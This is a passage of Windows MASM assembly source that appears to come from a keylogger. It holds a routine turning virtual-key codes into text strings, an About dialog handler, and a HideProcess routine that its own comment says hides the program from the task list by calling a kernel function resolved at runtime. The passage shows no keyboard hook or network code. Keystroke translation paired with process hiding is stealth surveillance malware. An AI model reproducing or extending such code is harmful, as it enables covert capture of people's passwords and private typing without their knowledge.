len_string, 6 .ELSEIF EAX == VK_UP INVOKE lstrcpy, addr_buffer, ADDR k_up MOV len_string, 4 .ELSEIF EAX == VK_RIGHT INVOKE lstrcpy, addr_buffer, ADDR k_right MOV len_string, 7 .ELSEIF EAX == VK_DOWN INVOKE lstrcpy, addr_buffer, ADDR k_down MOV len_string, 6 .ELSEIF EAX == VK_NUMPAD0 INVOKE lstrcpy, addr_buffer, ADDR k_numpad0 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD1 INVOKE lstrcpy, addr_buffer, ADDR k_numpad1 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD2 INVOKE lstrcpy, addr_buffer, ADDR k_numpad2 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD3 INVOKE lstrcpy, addr_buffer, ADDR k_numpad3 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD4 INVOKE lstrcpy, addr_buffer, ADDR k_numpad4 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD5 INVOKE lstrcpy, addr_buffer, ADDR k_numpad5 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD6 INVOKE lstrcpy, addr_buffer, ADDR k_numpad6 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD7 INVOKE lstrcpy, addr_buffer, ADDR k_numpad7 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD8 INVOKE lstrcpy, addr_buffer, ADDR k_numpad8 MOV len_string, 10 .ELSEIF EAX == VK_NUMPAD9 INVOKE lstrcpy, addr_buffer, ADDR k_numpad9 MOV len_string, 10 .ELSEIF EAX == VK_DIVIDE || EAX == 0BFh MOV AL, '/' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_MULTIPLY MOV AL, '*' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_SUBTRACT || EAX == 0BDh MOV AL, '-' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_ADD MOV AL, '+' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == VK_DECIMAL || EAX == 0BEh MOV AL, '.' 
MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0C0h MOV AL, '`' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BAh MOV AL, ';' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BBh MOV AL, '=' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0BCh MOV AL, ',' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DBh MOV AL, '[' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DCh || EAX == 0E2h MOV AL, '\' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DDh MOV AL, ']' MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSEIF EAX == 0DEh MOV AL, 27h MOV EBX, addr_buffer MOV BYTE PTR [EBX], AL MOV len_string, 1 .ELSE INVOKE lstrcpy, addr_buffer, ADDR k_unknown MOV len_string, 9 .ENDIF MOV EAX, len_string RETTranslateVirtualKeyCode ENDP;*******************************************************************************************************************;*******************************************************************************************************************dlgabout PROC hDlg:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM .IF uMsg==WM_INITDIALOG INVOKE MessageBeep, NULL INVOKE GetDlgItem, hDlg, IDC_BUTTON3 INVOKE SetFocus, EAX .ELSEIF uMsg == WM_CLOSE INVOKE EndDialog, hDlg, NULL .ELSEIF uMsg == WM_COMMAND MOV EAX, wParam .IF AX == IDC_BUTTON3 INVOKE SendMessage, hDlg, WM_CLOSE, NULL, NULL .ENDIF .ELSE MOV EAX, FALSE RET .ENDIF MOV EAX, TRUE RETdlgabout ENDP;*******************************************************************************************************************;This function will try to hide this program from the task list. 
If successful, return 0; else;returns -1 (0FFFFFFFFh).;*******************************************************************************************************************HideProcess PROC LOCAL h_kernel:DWORD, addr_function:DWORD, return_val:DWORD INVOKE GetModuleHandle, ADDR kernel_name MOV h_kernel, EAX INVOKE GetProcAddress, h_kernel, ADDR kernel_function MOV addr_function, EAX .IF EAX == NULL MOV return_val, -1 .ELSE PUSH 1 PUSH 0 CALL EAX AND return_val, 0 .ENDIF MOV EAX, return_val RETHideProcess ENDP;*******************************************************************************************************************END start